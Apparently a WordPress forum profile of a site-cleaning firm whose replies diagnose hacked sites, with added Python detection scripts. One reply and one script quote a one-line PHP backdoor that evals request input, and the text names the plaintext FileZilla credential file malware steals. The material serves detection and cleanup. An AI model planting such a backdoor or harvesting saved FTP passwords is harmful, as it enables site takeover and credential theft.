WeWatch
Forum Replies Created
Forum: Fixing WordPress
In reply to: Hacker registered user
We’ve been seeing this with some accounts and it’s typically been that the hackers have the password to an admin-level account in your WordPress. This might be due to a password-stealing trojan on someone’s local computer. Even Macs.
Forum: Reviews
In reply to: [Captcha on Login] Dreamhost is saying this is malware
That plugin does not contain malicious code. They use the same obfuscation method as some malicious code does, but the plugin code only shows a div tag with the captcha in it.
Dreamhost just saw the code that “looked” like malicious code, but they never deobfuscated it so they just said it was malicious.
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] MW:SPAM:SEO spam problem
You’ll find that code in not only .php and .js files, but also any .html files located anywhere in your folders.
In .js files we typically find it in the swfobject.js but you may find it in other files as well: collect.js and others.
If it’s in the collect.js, then your site could be used in the next round of malicious updates: (your ip address)/(path to collect.js)/collect.js
Just a thought…
It does appear to be related to the revslider plugin exploit.
Forum: Fixing WordPress
In reply to: Help please – site gone down, just getting text
The IP address in that code you posted (91.196.216.30) is in Russia. You have been hacked.
The wp-admin, wp-content and wp-includes are folders. You need to look in the root of your WordPress folder for a file named wp-settings.php.
This is possibly the result of a vulnerable timthumb.php or thumb.php file in your theme.
Go to: /wp-content/themes and search the folders for a file named timthumb.php. Go to: http://timthumb.googlecode.com/svn/trunk/timthumb.php to get the most recent version (2.8) of timthumb.php and replace every timthumb.php with the new one.
Then, also check your wp-config.php file. A normal wp-config.php should be about 3kb. If yours is infected it will be about 7kb. What the hackers are doing is adding hundreds of blank lines, then their malicious code, then hundreds more blank lines, so scroll down to find the malicious code.
You also have to check the .js files, as the hackers using the timthumb.php exploit have also been injecting malicious JavaScript code.
Post back if you have more questions…
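An added example (not code from this reply or from WeWatch) of the wp-config.php check described above, done by script rather than by scrolling: it measures the file size, finds runs of blank lines, and reports the first non-blank line after each run, which is where the reply says the injected code sits. The sample file, the 50-line run threshold and the 5000-byte size threshold (between the 3kb normal and 7kb infected sizes the reply gives) are assumptions chosen for the example.

```python
import re

# Constructed sample, not a real site's file: a wp-config.php padded the way the
# reply describes (hundreds of blank lines, injected code, hundreds more blank lines).
# The eval(base64_decode(...)) line is a harmless stand-in for whatever the injected code was.
SAMPLE_WP_CONFIG = (
    "<?php\n"
    "define('DB_NAME', 'wordpress');\n"
    "define('DB_USER', 'wp_user');\n"
    + "\n" * 300
    + "/* constructed stand-in for injected code */ eval(base64_decode('QUJD'));\n"
    + "\n" * 300
    + "require_once(ABSPATH . 'wp-settings.php');\n"
)


def blank_line_runs(text, min_run=50):
    """Return (first_line, length) for every run of at least min_run consecutive blank lines."""
    runs = []
    start = None
    line_no = 0
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.strip() == "":
            if start is None:
                start = line_no
        else:
            if start is not None and line_no - start >= min_run:
                runs.append((start, line_no - start))
            start = None
    if start is not None and line_no + 1 - start >= min_run:  # run that reaches end of file
        runs.append((start, line_no + 1 - start))
    return runs


def lines_after_padding(text, min_run=50):
    """Return (line_number, content) of the first non-blank line after each long blank run.
    That is where the reply says the injected code is hidden."""
    lines = text.splitlines()
    found = []
    for start, length in blank_line_runs(text, min_run):
        idx = start - 1 + length  # zero-based index of the line right after the run
        if idx < len(lines):
            found.append((idx + 1, lines[idx].strip()))
    return found


def inspect_wp_config(text, min_run=50, size_warn=5000):
    """Summarise both checks from the reply: file size and blank-line padding."""
    size = len(text.encode("utf-8"))
    runs = blank_line_runs(text, min_run)
    return {
        "size_bytes": size,
        "blank_runs": runs,
        "lines_after_padding": lines_after_padding(text, min_run),
        "suspicious": size > size_warn or bool(runs),
    }


if __name__ == "__main__":
    report = inspect_wp_config(SAMPLE_WP_CONFIG)
    print("size:", report["size_bytes"], "bytes; blank runs:", report["blank_runs"])
    for n, content in report["lines_after_padding"]:
        print("line %d: %s" % (n, content))
```

Run it against a downloaded copy of the real wp-config.php by reading the file into `inspect_wp_config`; a legitimate file has no long blank runs, so every line it reports deserves a look.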
Forum: Fixing WordPress
In reply to: Multiple WP sites affected with Parse error: wp-load.php on line 52
If you see the above “google-analytics” code in your site code – you’ve been hacked.
Notice the part:
<script snc="http://www.google-analytics.com/urchin.js
See the snc instead of src? What that code does is replace the snc="http://www.google-analytics.com/urchin.js" with a different URL, and toward the end of the code it sets the source (src) to:
emob.src = emsp.substr(15);
To test it, replace the above string toward the end of the script tag with a statement like:
alert(emsp.substr(15));
and comment out:
emob.src = emsp.substr(15);
And you’ll see where that little bit of code is actually taking your visitors.
It’s bad and it should be removed.
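An added example (not from this reply or from WeWatch) that does the same analysis as the alert() trick above without running the injected script in a browser: it finds script tags carrying the misspelled snc= attribute, locates the `.src = var.substr(N)` assignment, looks up the string literal assigned to that variable and drops its first N characters to reveal the real destination. The HTML sample, the variable names and the placeholder URL are constructed; the script shape (a single quoted string literal assigned to the variable) is an assumption, since the reply only shows the substr(15) line.

```python
import re

JUNK = "Z" * 15  # the 15 filler characters that .substr(15) skips in the sample below

# Constructed sample, not a capture from a real site, shaped like the injected tag the
# reply describes: an snc= attribute carrying the google-analytics URL, a string whose
# first 15 characters are filler, and the real .src set from .substr(15).
SAMPLE_HTML = f'''<html><body>
<script snc="http://www.google-analytics.com/urchin.js" type="text/javascript">
var emob = document.createElement("script");
var emsp = "{JUNK}http://injected.example.invalid/loader.js";
emob.src = emsp.substr(15);
document.body.appendChild(emob);
</script>
</body></html>'''

# A <script> tag using snc= (no such attribute exists; it is the tell the reply points out).
SNC_TAG_RE = re.compile(r'<script\b[^>]*\bsnc\s*=', re.IGNORECASE)
# something.src = var.substr(N)
SUBSTR_SRC_RE = re.compile(r'\b(\w+)\.src\s*=\s*(\w+)\.substr\(\s*(\d+)\s*\)')


def find_snc_script_tags(html):
    """Offsets of every <script> tag that uses snc= instead of src=."""
    return [m.start() for m in SNC_TAG_RE.finditer(html)]


def resolve_substr_sources(html):
    """Work out, without executing the script, which URL each .src = var.substr(N)
    assignment resolves to: find the string literal assigned to var and drop N characters."""
    urls = []
    for m in SUBSTR_SRC_RE.finditer(html):
        var_name, offset = m.group(2), int(m.group(3))
        literal = re.search(
            r"""\b%s\s*=\s*(?:"([^"]*)"|'([^']*)')""" % re.escape(var_name), html)
        if literal:
            value = literal.group(1) if literal.group(1) is not None else literal.group(2)
            urls.append(value[offset:])
    return urls


def analyse(html):
    """Both indicators in one report for a page's HTML."""
    return {
        "snc_tags": len(find_snc_script_tags(html)),
        "real_sources": resolve_substr_sources(html),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_HTML))
```

Feed it the saved HTML of an affected page (for example via `open(path).read()`); any URL it lists under `real_sources` is where visitors were being sent, and it is read off the source rather than by loading the page.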
Forum: Fixing WordPress
In reply to: All wordpress blogs being HACKED
In a few of these very same cases, we’ve found the culprit to be a file that has nothing more than this in it:
/** Sets up vars and included files. */
if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
/** Stop sets up vars and included files. */
In many of these cases, this was found in an archives.php file in:
wp-content/themes/classic/ folder, but we’ve found it in other files as well. If you look in the access logs you’ll see POSTs of between 7,200 and 7,900 bytes around the same time your files are infected.
This has typically happened before the upgrade to 3.1, but wasn’t noticed until after.
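An added example (not from this reply or from WeWatch) covering the two checks above: a scan of PHP source for eval() applied to request input, as in the one-line backdoor quoted in the reply, and a filter over access-log lines for POST requests whose size field falls in the 7,200 to 7,900 byte range the reply mentions. The PHP sample and the log lines are constructed (documentation IP ranges, made-up timestamps); the log parser assumes the common/combined log format, in which the final numeric field is the size the server logged for that request.

```python
import re

# eval( ... $_REQUEST[ / $_GET[ / $_POST[ / $_COOKIE[ ...), optionally wrapped in one decoder call.
EVAL_REQUEST_RE = re.compile(
    r'eval\s*\(\s*(?:stripslashes|base64_decode|gzinflate|urldecode)?\s*\(?\s*'
    r'\$_(?:REQUEST|GET|POST|COOKIE)\s*\[',
    re.IGNORECASE,
)

# Common log format: client, ident, user, [time], "method path proto", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Constructed PHP sample reproducing the backdoor shape quoted in the reply.
SAMPLE_PHP = '''<?php
/** Sets up vars and included files. */
if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
/** Stop sets up vars and included files. */
get_header();
'''

# Constructed access-log lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2011:03:14:07 +0000] "GET /wp-content/themes/classic/archives.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Mar/2011:03:14:09 +0000] "POST /wp-content/themes/classic/archives.php HTTP/1.1" 200 7543',
    '198.51.100.7 - - [10/Mar/2011:03:20:00 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0',
]


def find_eval_backdoors(php_source):
    """Return (line_number, line) for every line that passes request input to eval()."""
    hits = []
    for n, line in enumerate(php_source.splitlines(), 1):
        if EVAL_REQUEST_RE.search(line):
            hits.append((n, line.strip()))
    return hits


def suspicious_posts(log_lines, low=7200, high=7900):
    """Return POST requests whose size field lies within [low, high] bytes."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group(3) != "POST" or m.group(6) == "-":
            continue
        size = int(m.group(6))
        if low <= size <= high:
            out.append({"ip": m.group(1), "time": m.group(2), "path": m.group(4),
                        "status": int(m.group(5)), "size": size})
    return out


if __name__ == "__main__":
    for n, line in find_eval_backdoors(SAMPLE_PHP):
        print("backdoor at line %d: %s" % (n, line))
    for hit in suspicious_posts(SAMPLE_LOG):
        print("suspicious POST:", hit)
```

Point `find_eval_backdoors` at each .php file under wp-content/themes and `suspicious_posts` at the raw access log; the timestamps of the matching POSTs can then be compared against the modification times of the infected files.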
Forum: Fixing WordPress
In reply to: Site Got Hacked
Oftentimes we see hacked WordPress sites that also use phpMyAdmin. The WordPress infection may not be the root cause of the infection, but phpMyAdmin could be.
Check and update all website software. Same thing with any shopping cart software and plugins.
That is a backdoor shell script that’s used numerous times. It provides hackers with the ability to upload files, modify datetime stamps on files, etc.
You should definitely delete it.
Is your WordPress version current?
I would think that your osCommerce is more to blame than WordPress, unless your WordPress is out of date. Then it could be either one, or both. Since you have an infection in both the WordPress and the osCommerce site, I would recommend that you check all WordPress files for anything that doesn’t belong. Or better yet, delete all the WordPress files and folders and re-install from scratch. That way you’ll be certain to get the infectious code.
As for osCommerce, you might want to check out this to “harden” your osCommerce installs:
http://wewatchyourwebsite.com/wordpress/2010/12/securing-oscommerce/
osCommerce is a constant attack vector for hackers.
Forum: Fixing WordPress
In reply to: Godaddy wordpress blog hacked
Sorry to be so late jumping in here, but here goes.
Many of these and other website infections are the result of stolen FTP or other login passwords.
These are typically stolen by a virus on a PC that has FTP access to the infected website. Especially when the website has been re-infected a few times.
I know everyone has anti-virus software installed, however, with so many variants of viruses the anti-virus (AV) companies have a difficult time keeping up. All it takes is one minute that your AV software isn’t up-to-date and you can be infected (well, your PC).
From there the virus learns how to evade detection of the AV software. If you’re using one of the free FTP programs, like FileZilla and you store your passwords in the software so you don’t have to login each time you want to transfer files, the login credentials are stored in a plain text file.
For FileZilla, you can see the file here:
C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml (user could be Administrator if you’re logging into your PC as Administrator)
All the information a virus needs is stored right there in plain text. It steals this information and sends it to a server, which then logs in to the website, downloads files, injects the malscript and then uploads them back to the website. If you have your FTP logs activated, you can see where the infected files came from.
The virus also works by “sniffing” the FTP traffic. Since FTP transmits all data, including username and password in plain text, it’s easy for the virus to see and steal the information this way as well. I have a YouTube video showing this here: http://www.youtube.com/watch?v=oYI1kssrrbc
Like I said, the virus learns how to evade detection of the currently installed anti-virus software, so you may need to use something different. Many have had good success with one of the following: Kaspersky, Avast or Vipre. If you’re already using one of these, then try one of the other two – it has to be different.
So, first change all FTP passwords. I generally recommend setting up a separate username and password for each user and making sure FTP logging is activated. That way if you do get infected, you can look in the logs and know for certain who was the cause.
Second, install a new AV and scan all PCs.
Third, remove the malscripts. If you have your website downloaded to your PC, you can use a program like grepWin (it’s free) to find and remove the malscript.
Fourth, if Google has blacklisted you, you’ll have to request a review from the Google Webmaster tools.
We clean websites for a living so I do know what I’m talking about here.
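An added example (not from this reply or from WeWatch) for the first step above: an audit of the FileZilla site manager file that lists which saved servers have a password stored in it and which of them use plain FTP, so you know exactly which credentials to change. It reports only that a password is present, never the password itself. The sample XML is constructed, and the layout (a FileZilla3/Servers/Server tree with Host, Port, Protocol, User and Pass elements, Protocol 0 meaning plain FTP) is an assumption about the file format rather than something the reply states.

```python
import xml.etree.ElementTree as ET

# Constructed sitemanager.xml in the assumed FileZilla layout; hosts and the secret are placeholders.
SAMPLE_SITEMANAGER = """<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>webmaster</User>
      <Pass>constructed-plaintext-secret</Pass>
      <Name>Company site (FTP)</Name>
    </Server>
    <Server>
      <Host>sftp.example.invalid</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Name>Staging (SFTP, no saved password)</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def audit_saved_logins(xml_text):
    """One record per saved server: host, user, whether a password is stored,
    and whether the protocol is plain FTP (assumed: Protocol 0)."""
    root = ET.fromstring(xml_text)
    findings = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        findings.append({
            "host": server.findtext("Host", ""),
            "user": server.findtext("User", ""),
            "password_saved": pass_el is not None and bool((pass_el.text or "").strip()),
            "plain_ftp": server.findtext("Protocol", "") == "0",
        })
    return findings


def credentials_to_rotate(xml_text):
    """(host, user) pairs whose saved password is readable by anything running as this Windows user."""
    return [(f["host"], f["user"]) for f in audit_saved_logins(xml_text) if f["password_saved"]]


if __name__ == "__main__":
    for f in audit_saved_logins(SAMPLE_SITEMANAGER):
        flags = []
        if f["password_saved"]:
            flags.append("password saved")
        if f["plain_ftp"]:
            flags.append("plain FTP")
        print("%s@%s: %s" % (f["user"], f["host"], ", ".join(flags) or "ok"))
    print("rotate:", credentials_to_rotate(SAMPLE_SITEMANAGER))
```

Run it with the contents of the sitemanager.xml path given in the reply; every pair it returns from `credentials_to_rotate` is a login to change on the server, and every record flagged as plain FTP is one to move to an encrypted protocol since, as the reply says, plain FTP carries the password in clear text on the wire as well.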